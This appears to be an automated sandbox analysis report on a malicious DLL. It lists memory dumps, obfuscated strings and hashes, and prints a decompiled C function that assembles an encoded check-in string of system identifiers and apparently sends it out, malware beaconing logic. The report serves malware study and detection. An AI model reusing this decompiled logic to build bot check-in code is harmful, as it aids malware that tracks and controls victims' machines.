DeleteColorSpace.GDI32(00000000), ref: 10017A08
DeleteColorSpace.GDI32(00000000), ref: 10017A10
DeleteColorSpace.GDI32(00000000), ref: 10017A18
DeleteColorSpace.GDI32(00000000), ref: 10017A20
DeleteColorSpace.GDI32(00000000), ref: 10017A28
DeleteColorSpace.GDI32(00000000), ref: 10017A30
DeleteColorSpace.GDI32(00000000), ref: 10017A38
DeleteColorSpace.GDI32(00000000), ref: 10017A40
DeleteColorSpace.GDI32(00000000), ref: 10017A48
DeleteColorSpace.GDI32(00000000), ref: 10017A50
DeleteColorSpace.GDI32(00000000), ref: 10017A58
DeleteColorSpace.GDI32(00000000), ref: 10017A60
DeleteColorSpace.GDI32(00000000), ref: 10017A68
DeleteColorSpace.GDI32(00000000), ref: 10017A70
DeleteColorSpace.GDI32(00000000), ref: 10017A78
DeleteColorSpace.GDI32(00000000), ref: 10017A80
DeleteColorSpace.GDI32(00000000), ref: 10017A88
RealizePalette.GDI32(0000101C), ref: 10017A93

Strings

rlGoyLNdfO, xrefs: 10013FAA
rlGoyLNdfO, xrefs: 10013A35
rlGoyLNdfO, xrefs: 10013C50
rlGoyLNdfO, xrefs: 10013EFA
rlGoyLNdfO, xrefs: 1001368E
rlGoyLNdfO, xrefs: 100140A7
rlGoyLNdfO, xrefs: 100138BF
rlGoyLNdfO, xrefs: 10013615
rlGoyLNdfO, xrefs: 1001390C
rlGoyLNdfO, xrefs: 1001407B
rlGoyLNdfO, xrefs: 100140D3
rlGoyLNdfO, xrefs: 10013B11
rlGoyLNdfO, xrefs: 100135A7
rlGoyLNdfO, xrefs: 10013E3F
rlGoyLNdfO, xrefs: 10013C3A
rlGoyLNdfO, xrefs: 10013DE7
rlGoyLNdfO, xrefs: 10013E34
rlGoyLNdfO, xrefs: 10013EE4
rlGoyLNdfO, xrefs: 10013B74
rlGoyLNdfO, xrefs: 10014070
rlGoyLNdfO, xrefs: 100135E9
rlGoyLNdfO, xrefs: 100135B2
rlGoyLNdfO, xrefs: 10013D21
rlGoyLNdfO, xrefs: 10013F7E
rlGoyLNdfO, xrefs: 10013A1F
rlGoyLNdfO, xrefs: 10013DFD
rlGoyLNdfO, xrefs: 100136AF
rlGoyLNdfO, xrefs: 1001397A
rlGoyLNdfO, xrefs: 10013D79
rlGoyLNdfO, xrefs: 10013A61
rlGoyLNdfO, xrefs: 1001402E
rlGoyLNdfO, xrefs: 10013830
rlGoyLNdfO, xrefs: 10013591
rlGoyLNdfO, xrefs: 100136FC
rlGoyLNdfO, xrefs: 100137D8
rlGoyLNdfO, xrefs: 10013CDF
rlGoyLNdfO, xrefs: 10013539
rlGoyLNdfO, xrefs: 100137AC
rlGoyLNdfO, xrefs: 10013964
rlGoyLNdfO, xrefs: 10013EAD
rlGoyLNdfO, xrefs: 10013985
rlGoyLNdfO, xrefs: 10013F1B
rlGoyLNdfO, xrefs: 10013851
rlGoyLNdfO, xrefs: 10014086
rlGoyLNdfO, xrefs: 10013AFB
rlGoyLNdfO, xrefs: 1001362B
rlGoyLNdfO, xrefs: 10013AF0
rlGoyLNdfO, xrefs: 10014091
rlGoyLNdfO, xrefs: 10013678
rlGoyLNdfO, xrefs: 1001394E
rlGoyLNdfO, xrefs: 1001364C
rlGoyLNdfO, xrefs: 1001405A
rlGoyLNdfO, xrefs: 10013FE1
rlGoyLNdfO, xrefs: 10013754
rlGoyLNdfO, xrefs: 10013FC0
rlGoyLNdfO, xrefs: 10013780
rlGoyLNdfO, xrefs: 100137F9
rlGoyLNdfO, xrefs: 10013922
rlGoyLNdfO, xrefs: 10013A82
rlGoyLNdfO, xrefs: 100140C8
rlGoyLNdfO, xrefs: 10013B48
rlGoyLNdfO, xrefs: 100139C7
rlGoyLNdfO, xrefs: 10013C9D
rlGoyLNdfO, xrefs: 10013BCC
rlGoyLNdfO, xrefs: 1001355A
rlGoyLNdfO, xrefs: 100135BD
rlGoyLNdfO, xrefs: 10013A98
rlGoyLNdfO, xrefs: 1001376A
rlGoyLNdfO, xrefs: 10013570
rlGoyLNdfO, xrefs: 10013E4A
rlGoyLNdfO, xrefs: 10014039
rlGoyLNdfO, xrefs: 10013712
Interface\{b196b287-bab4-101a-b69c-00aa00341d07}, xrefs: 10013506, 100180CC
rlGoyLNdfO, xrefs: 10013D6E
rlGoyLNdfO, xrefs: 10013A2A
rlGoyLNdfO, xrefs: 10013B3D
rlGoyLNdfO, xrefs: 10014065
rlGoyLNdfO, xrefs: 10013DDC
rlGoyLNdfO, xrefs: 10013E55
rlGoyLNdfO, xrefs: 10013ACF
rlGoyLNdfO, xrefs: 10013959
rlGoyLNdfO, xrefs: 10013523
rlGoyLNdfO, xrefs: 10013C19
rlGoyLNdfO, xrefs: 10013C7C
rlGoyLNdfO, xrefs: 10014002
rlGoyLNdfO, xrefs: 10013C87
rlGoyLNdfO, xrefs: 10013D63
rlGoyLNdfO, xrefs: 10013A40
rlGoyLNdfO, xrefs: 10013A8D
rlGoyLNdfO, xrefs: 1001366D
rlGoyLNdfO, xrefs: 10013F68
rlGoyLNdfO, xrefs: 1001381A
rlGoyLNdfO, xrefs: 10013641
rlGoyLNdfO, xrefs: 10013DB0
rlGoyLNdfO, xrefs: 10013901
rlGoyLNdfO, xrefs: 100135FF
rlGoyLNdfO, xrefs: 10013AE5
rlGoyLNdfO, xrefs: 10013867
rlGoyLNdfO, xrefs: 10013A14
rlGoyLNdfO, xrefs: 10013F9F
rlGoyLNdfO, xrefs: 1001409C
rlGoyLNdfO, xrefs: 100135C8
rlGoyLNdfO, xrefs: 1001371D
rlGoyLNdfO, xrefs: 10013D8F
rlGoyLNdfO, xrefs: 10013EB8
rlGoyLNdfO, xrefs: 10013FCB
rlGoyLNdfO, xrefs: 10013749
rlGoyLNdfO, xrefs: 10013FD6
rlGoyLNdfO, xrefs: 10013796
rlGoyLNdfO, xrefs: 10013AC4
rlGoyLNdfO, xrefs: 1001352E
rlGoyLNdfO, xrefs: 100138CA
rlGoyLNdfO, xrefs: 100139B1
rlGoyLNdfO, xrefs: 10013B53
rlGoyLNdfO, xrefs: 100137C2
rlGoyLNdfO, xrefs: 10013BF8
rlGoyLNdfO, xrefs: 10013BAB
rlGoyLNdfO, xrefs: 10013C66
rlGoyLNdfO, xrefs: 10013E97
rlGoyLNdfO, xrefs: 100136BA
rlGoyLNdfO, xrefs: 10013B95
rlGoyLNdfO, xrefs: 100136E6
rlGoyLNdfO, xrefs: 100139D2
rlGoyLNdfO, xrefs: 1001350D
rlGoyLNdfO, xrefs: 10013DD1
rlGoyLNdfO, xrefs: 10013888
rlGoyLNdfO, xrefs: 10013A09
rlGoyLNdfO, xrefs: 10013A4B
rlGoyLNdfO, xrefs: 10013AAE
rlGoyLNdfO, xrefs: 10013CB3
rlGoyLNdfO, xrefs: 10013917
rlGoyLNdfO, xrefs: 10013A56
rlGoyLNdfO, xrefs: 10013DA5
rlGoyLNdfO, xrefs: 10013E13
rlGoyLNdfO, xrefs: 1001373E
rlGoyLNdfO, xrefs: 10013B1C
rlGoyLNdfO, xrefs: 10013E8C
rlGoyLNdfO, xrefs: 100136DB
rlGoyLNdfO, xrefs: 1001404F
rlGoyLNdfO, xrefs: 10013C71
rlGoyLNdfO, xrefs: 10013ECE
rlGoyLNdfO, xrefs: 10013F26
rlGoyLNdfO, xrefs: 10013B7F
rlGoyLNdfO, xrefs: 100137B7
rlGoyLNdfO, xrefs: 10013CF5
rlGoyLNdfO, xrefs: 10013F47
rlGoyLNdfO, xrefs: 10013E81
rlGoyLNdfO, xrefs: 10013F5D
rlGoyLNdfO, xrefs: 10013E60
rlGoyLNdfO, xrefs: 10013943
rlGoyLNdfO, xrefs: 100137EE
rlGoyLNdfO, xrefs: 100136D0
rlGoyLNdfO, xrefs: 1001383B
rlGoyLNdfO, xrefs: 100135F4
rlGoyLNdfO, xrefs: 10013CBE
rlGoyLNdfO, xrefs: 100138B4
rlGoyLNdfO, xrefs: 10013D58
rlGoyLNdfO, xrefs: 10013F89
rlGoyLNdfO, xrefs: 10013636
rlGoyLNdfO, xrefs: 10013EEF
rlGoyLNdfO, xrefs: 10013BD7
rlGoyLNdfO, xrefs: 10013D00
rlGoyLNdfO, xrefs: 1001396F
rlGoyLNdfO, xrefs: 10013EA2
rlGoyLNdfO, xrefs: 100139FE
rlGoyLNdfO, xrefs: 100140B2
rlGoyLNdfO, xrefs: 100138D5
rlGoyLNdfO, xrefs: 10013657
rlGoyLNdfO, xrefs: 10013E6B
rlGoyLNdfO, xrefs: 1001387D
rlGoyLNdfO, xrefs: 10013D42
rlGoyLNdfO, xrefs: 10014018
rlGoyLNdfO, xrefs: 1001354F
rlGoyLNdfO, xrefs: 1001378B
rlGoyLNdfO, xrefs: 100137E3
rlGoyLNdfO, xrefs: 100138A9
rlGoyLNdfO, xrefs: 10013B69
rlGoyLNdfO, xrefs: 10013C0E
rlGoyLNdfO, xrefs: 10013F31
rlGoyLNdfO, xrefs: 10013872
rlGoyLNdfO, xrefs: 10013565
rlGoyLNdfO, xrefs: 10013C92
rlGoyLNdfO, xrefs: 10013AB9
rlGoyLNdfO, xrefs: 10013C5B
rlGoyLNdfO, xrefs: 10013FEC
rlGoyLNdfO, xrefs: 100140BD
rlGoyLNdfO, xrefs: 10013BB6
rlGoyLNdfO, xrefs: 1001357B
rlGoyLNdfO, xrefs: 10013CC9
rlGoyLNdfO, xrefs: 1001399B
rlGoyLNdfO, xrefs: 10013F05
rlGoyLNdfO, xrefs: 10013733
rlGoyLNdfO, xrefs: 10013CA8
rlGoyLNdfO, xrefs: 1001385C
rlGoyLNdfO, xrefs: 10013C24
rlGoyLNdfO, xrefs: 10013586
rlGoyLNdfO, xrefs: 10013B27
rlGoyLNdfO, xrefs: 10013825
rlGoyLNdfO, xrefs: 10013E29
rlGoyLNdfO, xrefs: 10013F94
rlGoyLNdfO, xrefs: 10013D84
rlGoyLNdfO, xrefs: 10013F10
rlGoyLNdfO, xrefs: 1001380F
rlGoyLNdfO, xrefs: 10013F73
rlGoyLNdfO, xrefs: 10013AA3
rlGoyLNdfO, xrefs: 100135D3
rlGoyLNdfO, xrefs: 1001392D
rlGoyLNdfO, xrefs: 10013D0B
rlGoyLNdfO, xrefs: 100138E0
rlGoyLNdfO, xrefs: 10013D4D
rlGoyLNdfO, xrefs: 10013775
rlGoyLNdfO, xrefs: 10013BE2
rlGoyLNdfO, xrefs: 100139F3
rlGoyLNdfO, xrefs: 100139BC
rlGoyLNdfO, xrefs: 10013F52
rlGoyLNdfO, xrefs: 10013FF7
rlGoyLNdfO, xrefs: 10013ADA
rlGoyLNdfO, xrefs: 10013CEA
rlGoyLNdfO, xrefs: 10013FB5
rlGoyLNdfO, xrefs: 1001359C
rlGoyLNdfO, xrefs: 1001389E
rlGoyLNdfO, xrefs: 100139A6
rlGoyLNdfO, xrefs: 10013EC3
rlGoyLNdfO, xrefs: 100137CD
rlGoyLNdfO, xrefs: 10013804
rlGoyLNdfO, xrefs: 10013A6C
rlGoyLNdfO, xrefs: 10013662
rlGoyLNdfO, xrefs: 10013BED
rlGoyLNdfO, xrefs: 10014044
rlGoyLNdfO, xrefs: 100136F1
rlGoyLNdfO, xrefs: 10013C03
rlGoyLNdfO, xrefs: 100135DE
rlGoyLNdfO, xrefs: 10014023
rlGoyLNdfO, xrefs: 10013B5E
rlGoyLNdfO, xrefs: 10013ED9
rlGoyLNdfO, xrefs: 100139E8
rlGoyLNdfO, xrefs: 10013BA0
rlGoyLNdfO, xrefs: 10013D2C
rlGoyLNdfO, xrefs: 10013E76
rlGoyLNdfO, xrefs: 10013B32
rlGoyLNdfO, xrefs: 10013C2F
rlGoyLNdfO, xrefs: 10013E1E
rlGoyLNdfO, xrefs: 10013518
rlGoyLNdfO, xrefs: 100138F6
rlGoyLNdfO, xrefs: 10013544
rlGoyLNdfO, xrefs: 10013620
rlGoyLNdfO, xrefs: 10013846
rlGoyLNdfO, xrefs: 10013D16
rlGoyLNdfO, xrefs: 1001375F
rlGoyLNdfO, xrefs: 10013699
rlGoyLNdfO, xrefs: 10013707
rlGoyLNdfO, xrefs: 10013CD4
rlGoyLNdfO, xrefs: 10013DC6
rlGoyLNdfO, xrefs: 10013DF2
rlGoyLNdfO, xrefs: 10013B8A
rlGoyLNdfO, xrefs: 100136A4
rlGoyLNdfO, xrefs: 10013893
rlGoyLNdfO, xrefs: 10013B06
rlGoyLNdfO, xrefs: 100139DD
rlGoyLNdfO, xrefs: 10013DBB
rlGoyLNdfO, xrefs: 10013F3C
rlGoyLNdfO, xrefs: 1001360A
rlGoyLNdfO, xrefs: 100136C5
rlGoyLNdfO, xrefs: 10013D37
rlGoyLNdfO, xrefs: 10013990
rlGoyLNdfO, xrefs: 100137A1
rlGoyLNdfO, xrefs: 10013E08
rlGoyLNdfO, xrefs: 10013938
rlGoyLNdfO, xrefs: 10013728
rlGoyLNdfO, xrefs: 10013A77
rlGoyLNdfO, xrefs: 10013C45
rlGoyLNdfO, xrefs: 10013D9A
rlGoyLNdfO, xrefs: 10013BC1
rlGoyLNdfO, xrefs: 10013683
rlGoyLNdfO, xrefs: 100138EB
rlGoyLNdfO, xrefs: 1001400D

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDeleteSpace$CharNext$PaletteRealize
String ID: Interface\{b196b287-bab4-101a-b69c-00aa00341d07}$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO$rlGoyLNdfO
API String ID: 870247474-3068467819
Opcode ID: fdfb2115380492a62a1826c805d2aead30caab69d4a88bb09c61bf55e9ea088e
Instruction ID: d993b21650c0032e2966235a3a91d0d3528a914c08ef5e6b44a1e18ab30d6eac
Opcode Fuzzy Hash: fdfb2115380492a62a1826c805d2aead30caab69d4a88bb09c61bf55e9ea088e
Instruction Fuzzy Hash: B0938E3A545264EFF242ABE49D8DB9A7B60EB49703F034087F3569D1F3CF6464909B22

Uniqueness

Uniqueness Score: -1.00%

Function 02F61754, Relevance: 33.2, APIs: 22, Instructions: 248
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02F61754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x2f6d018; // 0xd5dd08ab
				asm("bswap eax");
				_t62 =  *0x2f6d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x2f6d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x2f6d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x2f6d2a4; // 0xb3a5a8
				_t3 = _t65 + 0x2f6e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x2f6d02c,  *0x2f6d004, _t60);
				_t68 = E02F657AB();
				_t69 =  *0x2f6d2a4; // 0xb3a5a8
				_t4 = _t69 + 0x2f6e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E02F673E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x2f6d2a4; // 0xb3a5a8
					_t7 = _t130 + 0x2f6e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x2f6d238, 0, _v8);
				}
				_t74 = E02F6614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x2f6d2a4; // 0xb3a5a8
					_t11 = _t125 + 0x2f6e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x2f6d238, 0, _v8);
				}
				_t150 =  *0x2f6d324; // 0x3aa95b0
				_t76 = E02F6757B(0x2f6d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0x2f6d238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x2f6d238, 0, 0x800); // executed
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x2f6d238, _t156, _v20);
						goto L26;
					}
					E02F6749F(GetTickCount());
					_t83 =  *0x2f6d324; // 0x3aa95b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x2f6d324; // 0x3aa95b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x2f6d324; // 0x3aa95b0
					_t152 = E02F64D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						RtlFreeHeap( *0x2f6d238, _t156, _v8); // executed
						goto L25;
					}
					StrTrimA(_t152, 0x2f6c294);
					_t95 =  *0x2f6d2a4; // 0xb3a5a8
					_push(_t152);
					_t18 = _t95 + 0x2f6e252; // 0x616d692f
					_t97 = E02F69DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						RtlFreeHeap( *0x2f6d238, _t156, _t152); // executed
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E02F6A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E02F66106();
						L22:
						HeapFree( *0x2f6d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E02F62F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E02F6A060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E02F6147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E02F61600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02F6147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02f61754
0x02f61754
0x02f61754
0x02f6175d
0x02f61766
0x02f61768
0x02f61768
0x02f61775
0x02f61780
0x02f61783
0x02f61788
0x02f61791
0x02f61794
0x02f61799
0x02f6179c
0x02f617a1
0x02f617a4
0x02f617b0
0x02f617bd
0x02f617bf
0x02f617c5
0x02f617ca
0x02f617d5
0x02f617d7
0x02f617da
0x02f617dc
0x02f617e1
0x02f617e7
0x02f617ec
0x02f617ef
0x02f617f4
0x02f61801
0x02f61803
0x02f61809
0x02f61813
0x02f61813
0x02f61815
0x02f6181a
0x02f6181f
0x02f61822
0x02f61827
0x02f61834
0x02f61836
0x02f61844
0x02f61844
0x02f61846
0x02f61854
0x02f61859
0x02f6185b
0x02f61860
0x02f61a2f
0x02f61a39
0x02f61a42
0x02f61866
0x02f61872
0x02f61878
0x02f6187d
0x02f61a23
0x02f61a2d
0x00000000
0x02f61a2d
0x02f61889
0x02f6188e
0x02f61897
0x02f618a8
0x02f618ac
0x02f618b5
0x02f618bb
0x02f618ca
0x02f618d1
0x02f618da
0x02f618e0
0x02f61a17
0x02f61a21
0x00000000
0x02f61a21
0x02f618ec
0x02f618f2
0x02f618f7
0x02f618f8
0x02f618ff
0x02f61904
0x02f61909
0x02f61a0d
0x02f61a15
0x00000000
0x02f61a15
0x02f61912
0x02f61919
0x02f61921
0x02f61926
0x02f6192f
0x02f61935
0x02f6193c
0x02f61941
0x02f61946
0x02f61a45
0x02f619f9
0x02f619f9
0x02f619fe
0x02f61a09
0x02f61a0b
0x00000000
0x02f61a0b
0x02f61950
0x02f61955
0x02f6195a
0x02f6195f
0x02f6196a
0x02f6196f
0x02f61972
0x02f61978
0x02f6197e
0x02f61984
0x02f61987
0x02f6198d
0x02f61990
0x02f61995
0x02f61999
0x02f61999
0x02f619a5
0x02f619b1
0x02f619b5
0x02f619b7
0x02f619bc
0x02f619be
0x02f619c3
0x02f619c8
0x02f619d5
0x02f619dd
0x02f619e0
0x02f619e0
0x02f619bc
0x00000000
0x02f619a7
0x02f619ab
0x02f619e2
0x02f619e5
0x02f619ee
0x00000000
0x00000000
0x00000000
0x00000000
0x02f619ee
0x02f619ad
0x00000000
0x02f619ad
0x02f619a5

APIs

GetTickCount.KERNEL32 ref: 02F61768
wsprintfA.USER32 ref: 02F617B8
wsprintfA.USER32 ref: 02F617D5
wsprintfA.USER32 ref: 02F61801
HeapFree.KERNEL32(00000000,?), ref: 02F61813
wsprintfA.USER32 ref: 02F61834
HeapFree.KERNEL32(00000000,?), ref: 02F61844
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F61872
GetTickCount.KERNEL32 ref: 02F61883
RtlEnterCriticalSection.NTDLL(03AA9570), ref: 02F61897
RtlLeaveCriticalSection.NTDLL(03AA9570), ref: 02F618B5

Part of subcall function 02F64D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02F652FE,?,03AA95B0), ref: 02F64D57
Part of subcall function 02F64D2C: lstrlen.KERNEL32(?,?,?,02F652FE,?,03AA95B0), ref: 02F64D5F
Part of subcall function 02F64D2C: strcpy.NTDLL ref: 02F64D76
Part of subcall function 02F64D2C: lstrcat.KERNEL32(00000000,?), ref: 02F64D81
Part of subcall function 02F64D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F652FE,?,03AA95B0), ref: 02F64D9E

StrTrimA.SHLWAPI(00000000,02F6C294,?,03AA95B0), ref: 02F618EC

